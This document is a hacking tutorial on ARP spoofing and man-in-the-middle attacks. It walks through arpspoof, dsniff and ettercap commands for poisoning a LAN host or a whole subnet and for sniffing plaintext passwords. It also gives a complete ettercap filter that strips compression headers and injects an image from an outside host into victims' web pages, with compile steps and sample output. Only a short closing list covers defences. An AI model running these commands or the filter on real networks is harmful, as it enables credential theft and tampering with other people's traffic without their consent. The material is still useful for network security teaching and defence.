ARP Spoofing/ARP Poisoning

ARP stands for Address Resolution Protocol and it allows the network to translate IP addresses into MAC addresses. Basically, ARP works like this: When one host using IP on a LAN is trying to contact another it needs the MAC address of the host it is trying to contact. It first looks in its ARP cache (to see your ARP cache in Windows type in "arp -a" at the command line) to see if it already knows the MAC address, but if not, it broadcasts out an ARP request asking "Yo, who has this IP address I'm looking for?" If the host that has that IP address hears the ARP query it will respond with its own MAC address and a conversation can begin using IP. In common bus networks like Ethernet using a hub or 802.11b all traffic can be seen by all hosts whose NICs (network interface card) are in promiscuous mode, but things are a bit different on switched networks. A switch looks at the data sent to it and tries to only forward packets to its intended recipient based on the MAC address. Switched networks are more secure and help speed up the network by only sending packets where they need to go. There are ways around switches though. Using a program like Arpspoof (part of the Dsniff package), Ettercap or Cain we can lie to other machines on the local area network and tell them we have the IP they are looking for, thus funneling their traffic through us.

Even with a switched network it's not hard for an attacker to use Dsniff or Ettercap from the BackTrack boot CD to do some ARP spoofing and redirect traffic through them for the purposes of sniffing. These tools can even parse out usernames and passwords automatically, making the attacker's job easy. If the attacker ARP Spoofs between the gateway and the FTP server he can sniff the traffic and extract user names and passwords as users are trying to get their data from offsite, and the same thing goes for SMTP and POP3. Even with SFTP, SSL, and SSH, passwords can still be sniffed with Ettercap because it has the ability to proxy those types of connections. The user might get a warning that the public key of the server they are trying to get to has changed or may not be valid, but how many of us just click past those kinds of messages without actually reading them?

external image mim.png The image in figure 1 helps to illustrate how ARP Spoofing/ARP Poisoning works. Basically, the attacker is telling Alan's box that he has the IP that corresponds to Brian's box and vice versa. By doing this the attacker receives all network traffic going between Alan and Brian. Once the attacker has ARP Spoofed his way between two nodes he can sniff the connection with whatever tool he likes (TCPDump, Wireshark, Ngrep, etc.) By ARP Spoofing between a computer and the LAN's gateway an attacker can see all the traffic the computer is sending out and receiving from the Internet. In this article I'm only giving the basics of how these tools are used.

A quick demonstration of ARP Spoofing using Dsniff Tools and Ettercap

Let's start by using Dug Song's Arpspoof program that comes with his Dsniff package. I use the *nix version but if you look around you may be able to find a Win32 version. The easiest way to run Dsniff is to boot from a BackTrack boot CD. The first thing you should do is make sure packet forwarding is turned on, otherwise our machine will drop all traffic between the hosts we are trying to sniff, causing a denial of service. Some of the tools I use do this automatically (Like Ettercap), but to be sure, you may want to do it yourself. Use the following commands, depending on operating system:

Linux:
echo 1 > /proc/sys/net/ipv4/ip_forward

BSD:
sysctl -w net.inet.ip.forwarding=1

Now that your computer will forward the traffic you can start ARP Spoofing. Let's assume you want to sniff all traffic between a host and the gateway so you can see the traffic it's sending to the Internet. To get traffic in both directions you would use the following two commands:

arpspoof -t 192.168.1.1 192.168.1.2 & >/dev/null
arpspoof -t 192.168.1.2 192.168.1.1 & >/dev/null


The "& >/dev/nul" part is there to make it easier to run from one terminal, but you may want to omit it for debugging purposes. Now you can use any package you wish to sniff the connection. To start with I'd recommend using the Sniffer Dsniff that comes along with Arpspoof to sniff for plain text passwords. To start sniffing with Dsniff just drop out to a command shell and type:

dsniff

As Dsniff finds passwords and usernames it will print them to the screen. To look at all sorts of other traffic I would recommend TCPDump or Wireshark. When you are ready to stop ARP Spoofing issue the following command:

killall arpspoof

This should kill the two instances of Arpspoof started above.

Another great tool is Ettercap, the Swiss army knife of ARP Poisoning and password sniffing. I usually use it in non-interactive mode, but by default it has a ncurses interface that some may find easier to use. If you would like to use Ettercap for ARP poisoning instead, the following commands should serve as good examples. If we wanted to target all hosts on the network and sniff traffic between every node, we would use the following command:

ettercap -T -q -M ARP

Be careful with the above command, having all of the traffic on a large network going though one slow computer can really bog down network connections. If we had a specific victim in mind, let's say a host with the IP 192.168.1.1, we would use this command:

ettercap -T -q -M ARP /192.168.1.1/ //

If 192.168.1.1 is the gateway, we should be able to see all outgoing traffic. Here are what the command line option flags do:

-T tells Ettercap to use the text interface, I like this option the best as the more GUI modes are rather confusing.
-q tells Ettercap to be more quiet, in other words less verbose.
-M tells Ettercap the MITM (Man in the Middle) method we want to use, in this case ARP poisoning.

For some other things you can do with Ettercap check out my video Fun with Ettercap Filters: The Movie.

Fun with Ettercap Filters
Read this then see the Flash video at:
http://www.irongeek.com/i.php?page=videos/ettercapfiltervid1

Ettercap[1] is sort of the Swiss army knife of ARP poisoning[2] and network sniffing. Ettercap can be extended by using filters and plug-ins, making it able to do all sorts of neat network tasks. Using filters is what I plan to show in this tutorial. The easiest way to run Ettercap is from the Auditor[3] or Knoppix boot CDs. The version I will be running in this tutorial is Ettercap NG-0.7.3.
What first inspired me to play with Ettercap filters was the use of Airpwn at Defcon 12[4] . The creators of Airpwn used their ingenious little tool to replace images in web pages that conference attendees surfed to with the Goatse image. If you don't know what Goatse is, you probably don't want to ask. Airpwn can be a bit difficult to configure, compile and run, but I figured I could do much the same thing with an Ettercap filter. Since Ettercap can be compiled on Linux, BSD, Mac OS X and Windows 200/XP/2003 and can work on wireless (802.11) and wired LANs its target audience is much larger than Airpwn's. Ettercap has the ability to route traffic though itself using "Man in the Middle" attacks and then use filters to modify the data before sending it on to the victim. Initially I wanted to do the same thing as the Airpwn guys, but with the Tubgirl image instead (once again, don't ask, I'm a sick bastard). For this tutorial I decided to compromise and just have the images in web pages replaced by the Jolly Rogers:
external image jollypwn.png
Yes, this tutorial is a bit deviant, but you can use the skills learned from it to do many other useful tasks. The first thing we need to do is create an Ettercap filter. Below is the source code for mine:
|||| Source code for ig.filter ||


############################################################################
#                                                                          #
#  Jolly Pwned -- ig.filter -- filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                             #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}
 


The code should be pretty self explanatory to anyone who has done much coding before (it's very much like C and other languages). The # symbols are comments. The "if" statement tells the filter to only work on TCP packet from source port 80, in other words coming from a web server. This test may still miss some images, but should get most of them. I'm also not sure about Ettercap's order of operation with AND (&&) and OR (||) statements but this filter largely seems to work (I tried using parentheses to explicitly specify the order of operation with the Boolean operators but this gave me compile errors). The "replace" function replaces the first parameter string with the second. Because of the way this string replacement works it will try to mangled image tags and insert the picture we desire into the web page's HTML before it returns it to the victim. The tags may end up looking something like the following:
<img src="http://www.irongeek.com/images/jollypwn.png" /images/original-image.jpg>
The original image location will still be in the tag, but most web browsers should see it as a useless parameter. The "msg" function just prints to the screen letting us know that the filter has fired off.
Now that we sort of understand the basics of the filter lets compile it. Take the ig.filter source code listed above and paste it into a text file, then compile the filter into a .ef file using the following command:
etterfilter ig.filter -o ig.ef
Now that are filter is compiled we need to target the hosts we want to ARP poison and run the filter on. Here is a quote form Ettercap's MAN page on how Targeting works:
|| Quote from Ettercap's MAN page: ||
TARGET SPECIFICATION
There is no concept of SOURCE nor DEST. The two targets are intended to
filter traffic coming from one to the other and vice-versa (since the
connection is bidirectional).

TARGET is in the form MAC/IPs/PORTs. If you want you can omit any of
its parts and this will represent an ANY in that part.
e.g.
"80" means ANY mac address, ANY ip and ONLY port 80
"/10.0.0.1/" means ANY mac address, ONLY ip 10.0.0.1 and ANY port

MAC must be unique and in the form 00:11:22:33:44:55

IPs is a range of IP in dotted notation. You can specify range with the
- (hyphen) and single ip with , (comma). You can also use ; (semicolon)
to indicate different ip addresses.
e.g.
"10.0.0.1-5;10.0.1.33" expands into ip 10.0.0.1, 2, 3, 4, 5 and
10.0.1.33

PORTs is a range of PORTS. You can specify range with the - (hyphen)
and single port with , (comma). e.g.
"20-25,80,110" expands into ports 20, 21, 22, 23, 24, 25, 80 and 110

NOTE:
you can reverse the matching of the TARGET by adding the -R option to
the command line. So if you want to sniff ALL the traffic BUT the one
coming or going to 10.0.0.1 you can specify "./ettercap -R /10.0.0.1/"

NOTE:
TARGETs are also responsible of the initial scan of the lan. You can
use them to restrict the scan to only a subset of the hosts in the net-
mask. The result of the merging between the two targets will be
scanned. remember that not specifying a target means "no target", but
specifying "
" means "all the hosts in the subnet.

So, if we wanted to target all hosts on the network we would use the following command:
ettercap -T -q -F ig.ef -M ARP
Be careful with the above command, having all of the traffic on a large network going though one slow computer can really bog down network connections. If we had a specific victim in mind, let's say a host with the IP 192.168.22.47, we would use this command:
ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ //
Here are what the command line option flags do:
    • -T tells Ettercap to use the text interface, I like this option the best as the more GUI modes are rather confusing.
    • -q tells Ettercap to be more quiet, in other words less verbose.
    • -F tells Ettercap to use a filter, in this case ig.ef that we compiled earlier.
    • -M tells Ettercap the MITM (Man in the Middle) method we want to use, in this case ARP poisoning.
Once Ettercap is running we should get some output something like the following:
ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ output:
root@Cthulhu:/usr/share/ettercap# ettercap -T -q -F ig.ef -M ARP /192.168.22.47/
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Content filters loaded from ig.ef...
Listening on eth0... (Ethernet)
eth0 -> 00:04:56:B8:70:AD 192.168.19.56 255.255.240.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 4095 hosts for scanning...
Scanning the whole netmask for 4095 hosts...
  • |==================================================>| 100.00 %
526 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.22.47 00:04:56:B8:70:AD
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Filter Ran.
Filter Ran.

Below you can see what the Antionline and Binrev web pages look like when the victim tries to view them:

Binrev ran though filter:
Antionline ran though filter:
external image efbinrev.png
external image efantionline.png

Cool huh? Keep in mind that this filter does not seem to fire off for all images, it's a little hit and miss. For more information on things you can do Ettercap filters look at the sample code in the file "etter.filter.examples" that comes along with Ettercap. On my box this file is located in /usr/share/ettercap/etter.filter.examples. Also check out Kev's tutorial on Ettercap filters[5]. Want to keep other folks from doing this kind of shenanigans on your network? Here are a few options:
1. Use static ARP tables between important hosts (not very practical in most cases).
2. Use ARPWatch or an IDS to spot when someone is pulling off an ARP poisoning attack.
3. Encrypted traffic using a VPN or SSL should make it though safely, unless of course the attacker uses some of Ettercap's proxing capabilities.
Enjoy.

Further Research: